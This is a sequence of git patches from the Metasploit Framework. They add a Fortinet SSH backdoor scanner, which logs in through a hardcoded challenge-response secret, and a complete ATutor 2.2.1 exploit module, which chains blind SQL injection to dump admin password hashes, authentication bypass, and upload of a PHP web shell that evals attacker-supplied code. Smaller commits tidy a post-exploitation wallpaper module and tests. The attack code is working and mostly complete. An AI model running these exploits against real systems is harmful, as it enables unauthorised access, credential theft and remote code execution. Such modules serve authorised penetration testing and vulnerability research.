18:19:14 -0600 Subject: [PATCH 435/686] Move Fortinet backdoor to module and library --- .../core/exploit/fortinet.rb} | 4 +- lib/net/ssh/authentication/session.rb | 1 - .../scanner/ssh/fortinet_backdoor.rb | 75 +++++++++++++++++++ 3 files changed, 78 insertions(+), 2 deletions(-) rename lib/{net/ssh/authentication/methods/fortinet_backdoor.rb => msf/core/exploit/fortinet.rb} (97%) create mode 100644 modules/auxiliary/scanner/ssh/fortinet_backdoor.rb diff --git a/lib/net/ssh/authentication/methods/fortinet_backdoor.rb b/lib/msf/core/exploit/fortinet.rb similarity index 97% rename from lib/net/ssh/authentication/methods/fortinet_backdoor.rb rename to lib/msf/core/exploit/fortinet.rb index cf6c3e04a5..3f12dc2926 100644 --- a/lib/net/ssh/authentication/methods/fortinet_backdoor.rb +++ b/lib/msf/core/exploit/fortinet.rb @@ -2,12 +2,14 @@ # https://www.ietf.org/rfc/rfc4256.txt +require 'net/ssh' + class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract USERAUTH_INFO_REQUEST = 60 USERAUTH_INFO_RESPONSE = 61 - def authenticate(service_name, username = 'Fortimanager_Access', password = nil) + def authenticate(service_name, username, password = nil) debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } send_message(userauth_request( diff --git a/lib/net/ssh/authentication/session.rb b/lib/net/ssh/authentication/session.rb index 0412f80722..7e07ccf696 100644 --- a/lib/net/ssh/authentication/session.rb +++ b/lib/net/ssh/authentication/session.rb @@ -7,7 +7,6 @@ require 'net/ssh/authentication/methods/publickey' require 'net/ssh/authentication/methods/hostbased' require 'net/ssh/authentication/methods/password' require 'net/ssh/authentication/methods/keyboard_interactive' -require 'net/ssh/authentication/methods/fortinet_backdoor' module Net; module SSH; module Authentication diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb new file mode 100644 index 0000000000..f38195e28f --- /dev/null +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -0,0 +1,75 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/fortinet' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Fortinet SSH Backdoor Scanner', + 'Description' => %q{ + This module scans for the Fortinet SSH backdoor. + }, + 'Author' => [ + 'operator8203 <operator8203[at]runbox.com>', # PoC + 'wvu' # Module + ], + 'References' => [ + ['CVE', '2016-1909'], + ['EDB', '39224'], + ['PACKETSTORM', '135225'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'], + ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] + ], + 'DisclosureDate' => 'Jan 09 2016', + 'License' => MSF_LICENSE + )) + + register_options([ + Opt::RPORT(22) + ]) + + register_advanced_options([ + OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), + OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) + ]) + end + + def run_host(ip) + begin + ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do + Net::SSH.start( + ip, + 'Fortimanager_Access', + port: datastore['RPORT'], + auth_methods: ['fortinet-backdoor'], + verbose: datastore['SSH_DEBUG'] ? :debug : nil + ) + end + rescue Net::SSH::Exception => e + vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}") + return + end + + if ssh + print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") + report_vuln( + :host => ip, + :name => self.name, + :refs => self.references, + :info => ssh.transport.server_version.version + ) + end + end + + def rport + datastore['RPORT'] + end + +end From 300fdc87bbe02de6666a86925ec31f9b612c1eb7 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Sat, 27 Feb 2016 18:19:14 -0600 Subject: [PATCH 436/686] Move Fortinet backdoor to module and library --- .../core/exploit/fortinet.rb} | 2 + lib/net/ssh/authentication/session.rb | 1 - .../scanner/ssh/fortinet_backdoor.rb | 80 +++++++++++++++++++ 3 files changed, 82 insertions(+), 1 deletion(-) rename lib/{net/ssh/authentication/methods/fortinet_backdoor.rb => msf/core/exploit/fortinet.rb} (99%) create mode 100644 modules/auxiliary/scanner/ssh/fortinet_backdoor.rb diff --git a/lib/net/ssh/authentication/methods/fortinet_backdoor.rb b/lib/msf/core/exploit/fortinet.rb similarity index 99% rename from lib/net/ssh/authentication/methods/fortinet_backdoor.rb rename to lib/msf/core/exploit/fortinet.rb index cf6c3e04a5..3d53989f7d 100644 --- a/lib/net/ssh/authentication/methods/fortinet_backdoor.rb +++ b/lib/msf/core/exploit/fortinet.rb @@ -2,6 +2,8 @@ # https://www.ietf.org/rfc/rfc4256.txt +require 'net/ssh' + class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract USERAUTH_INFO_REQUEST = 60 diff --git a/lib/net/ssh/authentication/session.rb b/lib/net/ssh/authentication/session.rb index 0412f80722..7e07ccf696 100644 --- a/lib/net/ssh/authentication/session.rb +++ b/lib/net/ssh/authentication/session.rb @@ -7,7 +7,6 @@ require 'net/ssh/authentication/methods/publickey' require 'net/ssh/authentication/methods/hostbased' require 'net/ssh/authentication/methods/password' require 'net/ssh/authentication/methods/keyboard_interactive' -require 'net/ssh/authentication/methods/fortinet_backdoor' module Net; module SSH; module Authentication diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb new file mode 100644 index 0000000000..a28b212ddd --- /dev/null +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -0,0 +1,80 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/fortinet' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Fortinet SSH Backdoor Scanner', + 'Description' => %q{ + This module scans for the Fortinet SSH backdoor. + }, + 'Author' => [ + 'operator8203 <operator8203[at]runbox.com>', # PoC + 'wvu' # Module + ], + 'References' => [ + ['CVE', '2016-1909'], + ['EDB', '39224'], + ['PACKETSTORM', '135225'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'], + ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] + ], + 'DisclosureDate' => 'Jan 09 2016', + 'License' => MSF_LICENSE + )) + + register_options([ + Opt::RPORT(22) + ]) + + register_advanced_options([ + OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), + OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) + ]) + end + + def run_host(ip) + ssh_opts = { + port: datastore['RPORT'], + auth_methods: ['fortinet-backdoor'] + } + + ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] + + begin + ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do + Net::SSH.start( + ip, + 'Fortimanager_Access', + ssh_opts + ) + end + rescue Net::SSH::Exception => e + vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}") + return + end + + if ssh + print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") + report_vuln( + :host => ip, + :name => self.name, + :refs => self.references, + :info => ssh.transport.server_version.version + ) + end + end + + def rport + datastore['RPORT'] + end + +end From f5ad1286d2855ee6ada761175ba6cb0729fe1025 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 29 Feb 2016 12:44:25 -0600 Subject: [PATCH 437/686] Fix #6615, fix typo "format" Fix #6615 --- modules/auxiliary/analyze/jtr_linux.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index 2b3483c60f..c519ea2b43 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ b/modules/auxiliary/analyze/jtr_linux.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary formats = [ 'md5', 'des', 'bsdi'] if datastore['Crypt'] - format << 'crypt' + formats << 'crypt' end cracker = new_john_cracker From d955c6a8f6b5643767fea5f961b2eb4b2076453d Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Mon, 29 Feb 2016 14:06:49 -0600 Subject: [PATCH 438/686] style fixes --- modules/post/multi/manage/set_wallpaper.rb | 73 +++++++++++----------- 1 file changed, 35 insertions(+), 38 deletions(-) diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index 5747f043a0..07dd50953e 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -6,22 +6,24 @@ require 'msf/core' class Metasploit3 < Msf::Post - include Msf::Post::File include Msf::Post::Windows::Registry - def initialize(info={}) - super( update_info( info, - 'Name' => 'Multi Manage Set Wallpaper', - 'Description' => %q{ - This module will set the desktop wallpaper background on the specified session. - The method of setting the wallpaper depends on the platform type. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'timwr'], - 'Platform' => [ 'win', 'osx', 'linux', 'android' ], - 'SessionTypes' => [ 'meterpreter' ] - )) + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Multi Manage Set Wallpaper', + 'Description' => %q( + This module will set the desktop wallpaper background on the specified session. + The method of setting the wallpaper depends on the platform type. + ), + 'License' => MSF_LICENSE, + 'Author' => [ 'timwr'], + 'Platform' => [ 'win', 'osx', 'linux', 'android' ], + 'SessionTypes' => [ 'meterpreter' ] + ) + ) register_options( [ @@ -29,22 +31,21 @@ class Metasploit3 < Msf::Post ], self.class) end - def upload_wallpaper(tempdir) - wallpaper_file = datastore["WALLPAPER_FILE"] - remote_file = "#{tempdir}#{File.basename(wallpaper_file)}" + def upload_wallpaper(tempdir, file) + remote_file = "#{tempdir}#{File.basename(file)}" print_status("#{peer} - Uploading to #{remote_file}") - localfile = File.open(wallpaper_file, "rb") {|fd| fd.read(fd.stat.size) } - write_file(remote_file, localfile) + + write_file(remote_file, File.binread(file)) print_status("#{peer} - Uploaded to #{remote_file}") remote_file end # - # The OSX version uses an apple script to do this + # The OS X version uses an AppleScript to do this # - def osx_set_wallpaper - remote_file = upload_wallpaper("/tmp/") - script = %Q|osascript -e 'tell application "Finder" to set desktop picture to POSIX file "#{remote_file}"' | + def osx_set_wallpaper(file) + remote_file = upload_wallpaper("/tmp/", file) + script = %(osascript -e 'tell application "Finder" to set desktop picture to POSIX file "#{remote_file}"') begin cmd_exec(script) rescue EOFError @@ -54,42 +55,38 @@ class Metasploit3 < Msf::Post end # - # The Windows version uses the SystemParametersInfo + # The Windows version uses the SystemParametersInfo call # - def win_set_wallpaper(id) - remote_file = upload_wallpaper("%TEMP%\\") - client.railgun.user32.SystemParametersInfoA(0x0014,nil,remote_file,0x2) - true + def win_set_wallpaper(file) + remote_file = upload_wallpaper("%TEMP%\\", file) + client.railgun.user32.SystemParametersInfoA(0x0014, nil, remote_file, 0x2) != 0 end # # The Android version uses the set_wallpaper command # - def android_set_wallpaper(id) - wallpaper_file = datastore["WALLPAPER_FILE"] - local_file = File.open(wallpaper_file, "rb") {|fd| fd.read(fd.stat.size) } - client.android.set_wallpaper(local_file) + def android_set_wallpaper(file) + client.android.set_wallpaper(File.binread(file)) true end - def set_wallpaper(id) - case session.platform + def os_set_wallpaper(file) + case platform when /osx/ - osx_set_wallpaper(id) + osx_set_wallpaper(file) when /win/ - win_set_wallpaper(id) + win_set_wallpaper(file) when /android/ - android_set_wallpaper(id) + android_set_wallpaper(file) end end def run file = datastore['WALLPAPER_FILE'] - if set_wallpaper(file) + if os_set_wallpaper(file) print_good("#{peer} - The wallpaper has been set") else print_error("#{peer} - Unable to set the wallpaper") end end - end From c2f7360a9a466b9dacf906d57ebfe6cac7729481 Mon Sep 17 00:00:00 2001 From: Gregory Mikeska <greg_mikeska@rapid7.com> Date: Mon, 29 Feb 2016 14:57:09 -0600 Subject: [PATCH 439/686] replace deprecated 'ignore' with 'transient' --- spec/factories/mdm/module_details.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/spec/factories/mdm/module_details.rb b/spec/factories/mdm/module_details.rb index c67f200128..63fdb2276b 100644 --- a/spec/factories/mdm/module_details.rb +++ b/spec/factories/mdm/module_details.rb @@ -1,6 +1,6 @@ FactoryGirl.modify do factory :mdm_module_detail do - ignore do + transient do root { Metasploit::Framework.root } From a3fa57c8f630802b26797f3ee9533549b4a49ed5 Mon Sep 17 00:00:00 2001 From: net-ninja <steventhomasseeley@gmail.com> Date: Mon, 29 Feb 2016 14:59:26 -0600 Subject: [PATCH 440/686] Add CVE-2016-2555: ATutor 2.2.1 SQL Injection Exploit Module --- modules/exploits/multi/http/atutor_sqli.rb | 320 +++++++++++++++++++++ 1 file changed, 320 insertions(+) create mode 100644 modules/exploits/multi/http/atutor_sqli.rb diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb new file mode 100644 index 0000000000..ce277e0169 --- /dev/null +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -0,0 +1,320 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution', + 'Description' => %q{ + This module exploits a SQL Injection vulnerability and an authentication weakness + vulnerability in ATutor. This essentially means an attacker can bypass authenication + and reach the administrators interface where they can upload malcious code. + + You are required to login to the target to reach the SQL Injection, however this + can be done as a student account and remote registration is enabled by default. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code + ], + 'References' => + [ + [ 'CVE', '2016-2555' ], + [ 'URL', 'http://www.atutor.ca/' ] # Official Website + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Mar 1 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), + OptString.new('USERNAME', [true, 'The username to authenticate as', 'test']), + OptString.new('PASSWORD', [true, 'The password to authenticate with', 'Password123']) + ],self.class) + end + + def check + txt = Rex::Text.rand_text_alpha(8) + res = http_send_command("echo #{txt}") + + if res && res.body =~ /#{txt}/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + def push + uri = normalize_uri(target_uri.path) + + # To push the Enter button + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'vars_post' => { + 'frame' => '3', + 'pass' => '' # yep this should be empty + }, + 'agent' => 'Mozilla' + }) + + if res.nil? + vprint_error("#{peer} - Connection timed out") + fail_with(Failure::Unknown, "Failed to trigger the Enter button") + end + + if res && res.headers && res.code == 302 + print_good("#{peer} - Logged in to the file manager") + cookie = res.get_cookies + cookie + else + fail_with(Failure::Unknown, "#{peer} - Error entering the file manager") + end + end + + def create_zip_file + zip_file = Rex::Zip::Archive.new + @header = Rex::Text.rand_text_alpha_upper(4) + @payload_name = Rex::Text.rand_text_alpha_lower(4) + @plugin_name = Rex::Text.rand_text_alpha_lower(3) + + path = "#{@plugin_name}/#{@payload_name}.php" + + zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>") + zip_file.pack + end + + def exec_code + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"), + 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" + }) + end + + def upload_shell(cookie) + post_data = Rex::MIME::Message.new + post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"") + post_data.add_part('Install', nil, nil, "form-data; name=\"install_upload\"") + data = post_data.to_s + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => cookie, + 'agent' => 'Mozilla' + }) + + if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection), + 'cookie' => cookie, + 'agent' => 'Mozilla', + }) + if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"), + 'cookie' => cookie, + 'agent' => 'Mozilla', + }) + return true + end + end + + # auth failed if we land here, bail + fail_with(Failure::NoAccess, "Upload did not work") + return false + end + + def get_hashed_password(token, password, bypass) + if bypass + return Rex::Text.sha1(password + token) + else + return Rex::Text.sha1(Rex::Text.sha1(password) + token) + end + end + + def login(username, password, bypass) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "login.php"), + 'agent' => 'Mozilla', + }) + + token = $1 if res.body =~ /\) \+ \"(.*)\"\);/ + cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/ + if bypass + password = get_hashed_password(token, password, true) + else + password = get_hashed_password(token, password, false) + end + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "login.php"), + 'vars_post' => { + 'form_password_hidden' => password, + 'form_login' => username, + 'submit' => 'Login' + }, + 'cookie' => cookie, + 'agent' => 'Mozilla' + }) + cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/ + + # this is what happens when no state is maintained by the http client + if res && res.code == 302 + if res.redirection.to_s.include?('bounce.php?course=0') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, res.redirection), + 'cookie' => cookie, + 'agent' => 'Mozilla' + }) + cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/ + if res && res.code == 302 && res.redirection.to_s.include?('users/index.php') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, res.redirection), + 'cookie' => cookie, + 'agent' => 'Mozilla' + }) + cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/ + return cookie + end + else res.redirection.to_s.include?('admin/index.php') + # if we made it here, we are admin + return cookie + end + end + + # auth failed if we land here, bail + fail_with(Failure::NoAccess, "Authentication failed with username #{username}") + return nil + end + + def perform_request(sqli, cookie) + # the search requires a minimum of 3 chars + sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='" + rand_key = Rex::Text.rand_text_alpha(1) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"), + 'vars_post' => { + "search_friends_#{rand_key}" => sqli, + 'rand_key' => rand_key, + 'search' => 'Search People' + }, + 'cookie' => cookie, + 'agent' => 'Mozilla' + }) + return res.body + end + + def dump_the_hash(cookie) + extracted_hash = "" + sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)" + login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i + for i in 1..login_and_hash_length + sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))" + asciival = generate_sql_and_test(false, false, sqli, cookie) + if asciival >= 0 + extracted_hash << asciival.chr + end + end + return extracted_hash.split(":") + end + + def get_ascii_value(sql, cookie) + lower = 0 + upper = 126 + while lower < upper + mid = (lower + upper) / 2 + sqli = "#{sql}>#{mid}" + result = perform_request(sqli, cookie) + if result =~ /There are \d entries./ + lower = mid + 1 + else + upper = mid + end + end + if lower > 0 and lower < 126 + value = lower + else + sqli = "#{sql}=#{lower}" + result = perform_request(sqli, cookie) + if result =~ /There are \d entries./ + value = lower + end + end + return value + end + + def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie) + if do_test + if do_true + result = perform_request("1=1", cookie) + if result =~ /There are \d entries./ + return true + end + else not do_true + result = perform_request("1=2", cookie) + if not result =~ /There are \d entries./ + return true + end + end + else not do_test and sql + return get_ascii_value(sql, cookie) + end + end + + def test_injection(cookie) + if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie) + if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie) + return true + end + end + return false + end + + def exploit + student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) + print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...") + + if test_injection(student_cookie) + print_good("Test injection working!") + print_status("Dumping username and password hash...") + credz = dump_the_hash(student_cookie) + print_good("Got the #{credz[0]} hash: #{credz[1]} !") + if credz + admin_cookie = login(credz[0], credz[1], true) + print_status("Logged in as #{credz[0]}, uploading shell...") + if upload_shell(admin_cookie) + print_good("Shell upload successful!") + exec_code + end + end + end + end +end + From cb0493e5bb7f124c7710a323b1e543d4ae59abd6 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Mon, 29 Feb 2016 14:56:49 -0600 Subject: [PATCH 441/686] Recreate Msf::Exploit::Remote::Fortinet To match the path, even though it's kinda lame including it just for the monkeypatch. --- lib/msf/core/exploit/fortinet.rb | 150 +++++++++--------- lib/msf/core/exploit/mixins.rb | 3 + .../scanner/ssh/fortinet_backdoor.rb | 3 +- 3 files changed, 80 insertions(+), 76 deletions(-) diff --git a/lib/msf/core/exploit/fortinet.rb b/lib/msf/core/exploit/fortinet.rb index 3d53989f7d..9b8aae1f9c 100644 --- a/lib/msf/core/exploit/fortinet.rb +++ b/lib/msf/core/exploit/fortinet.rb @@ -4,94 +4,96 @@ require 'net/ssh' -class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract +module Msf::Exploit::Remote::Fortinet + class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract - USERAUTH_INFO_REQUEST = 60 - USERAUTH_INFO_RESPONSE = 61 + USERAUTH_INFO_REQUEST = 60 + USERAUTH_INFO_RESPONSE = 61 - def authenticate(service_name, username = 'Fortimanager_Access', password = nil) - debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } + def authenticate(service_name, username = 'Fortimanager_Access', password = nil) + debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } - send_message(userauth_request( + send_message(userauth_request( =begin - string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) - string service name (US-ASCII) - string "keyboard-interactive" (US-ASCII) - string language tag (as defined in [RFC-3066]) - string submethods (ISO-10646 UTF-8) -=end - username, - service_name, - 'keyboard-interactive', - '', - '' - )) - - loop do - message = session.next_message - - case message.type - when USERAUTH_SUCCESS - debug { 'Received SSH_MSG_USERAUTH_SUCCESS' } - return true - when USERAUTH_FAILURE - debug { 'Received SSH_MSG_USERAUTH_FAILURE' } - return false - when USERAUTH_INFO_REQUEST - debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } - -=begin - string name (ISO-10646 UTF-8) - string instruction (ISO-10646 UTF-8) + string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) + string service name (US-ASCII) + string "keyboard-interactive" (US-ASCII) string language tag (as defined in [RFC-3066]) - int num-prompts - string prompt[1] (ISO-10646 UTF-8) - boolean echo[1] - ... - string prompt[num-prompts] (ISO-10646 UTF-8) - boolean echo[num-prompts] + string submethods (ISO-10646 UTF-8) =end - name = message.read_string - instruction = message.read_string - _ = message.read_string + username, + service_name, + 'keyboard-interactive', + '', + '' + )) - prompts = [] + loop do + message = session.next_message - message.read_long.times do - prompt = message.read_string - echo = message.read_bool - prompts << [prompt, echo] - end + case message.type + when USERAUTH_SUCCESS + debug { 'Received SSH_MSG_USERAUTH_SUCCESS' } + return true + when USERAUTH_FAILURE + debug { 'Received SSH_MSG_USERAUTH_FAILURE' } + return false + when USERAUTH_INFO_REQUEST + debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } - debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' } - - send_message(Net::SSH::Buffer.from( =begin - byte SSH_MSG_USERAUTH_INFO_RESPONSE - int num-responses - string response[1] (ISO-10646 UTF-8) + string name (ISO-10646 UTF-8) + string instruction (ISO-10646 UTF-8) + string language tag (as defined in [RFC-3066]) + int num-prompts + string prompt[1] (ISO-10646 UTF-8) + boolean echo[1] ... - string response[num-responses] (ISO-10646 UTF-8) + string prompt[num-prompts] (ISO-10646 UTF-8) + boolean echo[num-prompts] =end - :byte, USERAUTH_INFO_RESPONSE, - :long, 1, - :string, custom_handler(name, instruction, prompts) - )) - else - raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}" + name = message.read_string + instruction = message.read_string + _ = message.read_string + + prompts = [] + + message.read_long.times do + prompt = message.read_string + echo = message.read_bool + prompts << [prompt, echo] + end + + debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' } + + send_message(Net::SSH::Buffer.from( +=begin + byte SSH_MSG_USERAUTH_INFO_RESPONSE + int num-responses + string response[1] (ISO-10646 UTF-8) + ... + string response[num-responses] (ISO-10646 UTF-8) +=end + :byte, USERAUTH_INFO_RESPONSE, + :long, 1, + :string, custom_handler(name, instruction, prompts) + )) + else + raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}" + end end end - end - # http://seclists.org/fulldisclosure/2016/Jan/26 - def custom_handler(title, instructions, prompt_list) - n = prompt_list[0][0] - m = Digest::SHA1.new - m.update("\x00" * 12) - m.update(n + 'FGTAbc11*xy+Qqz27') - m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70") - h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest) - [h] - end + # http://seclists.org/fulldisclosure/2016/Jan/26 + def custom_handler(title, instructions, prompt_list) + n = prompt_list[0][0] + m = Digest::SHA1.new + m.update("\x00" * 12) + m.update(n + 'FGTAbc11*xy+Qqz27') + m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70") + h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest) + [h] + end + end end diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index ac7c718b7d..21808beede 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -116,3 +116,6 @@ require 'msf/core/exploit/http/jboss' # Kerberos Support require 'msf/core/exploit/kerberos/client' + +# Fortinet +require 'msf/core/exploit/fortinet' diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index a28b212ddd..71e0077f44 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -3,10 +3,9 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core/exploit/fortinet' - class Metasploit4 < Msf::Auxiliary + include Msf::Exploit::Remote::Fortinet include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report From 726c1c8d1e681466cd1f054a9ecadfc243e1386e Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 29 Feb 2016 15:43:47 -0600 Subject: [PATCH 442/686] There is no http_send_command, so I guess the check should not work --- modules/exploits/multi/http/atutor_sqli.rb | 11 ----------- 1 file changed, 11 deletions(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index ce277e0169..7cfd2bfa19 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -50,17 +50,6 @@ class Metasploit3 < Msf::Exploit::Remote ],self.class) end - def check - txt = Rex::Text.rand_text_alpha(8) - res = http_send_command("echo #{txt}") - - if res && res.body =~ /#{txt}/ - return Exploit::CheckCode::Vulnerable - else - return Exploit::CheckCode::Safe - end - end - def push uri = normalize_uri(target_uri.path) From 4cc690fd8dc2e4e3547a6dc4d6634f6c2968f300 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 29 Feb 2016 15:45:33 -0600 Subject: [PATCH 443/686] Let the user specify username/password --- modules/exploits/multi/http/atutor_sqli.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index 7cfd2bfa19..85e0be9fd8 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -45,8 +45,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), - OptString.new('USERNAME', [true, 'The username to authenticate as', 'test']), - OptString.new('PASSWORD', [true, 'The password to authenticate with', 'Password123']) + OptString.new('USERNAME', [true, 'The username to authenticate as']), + 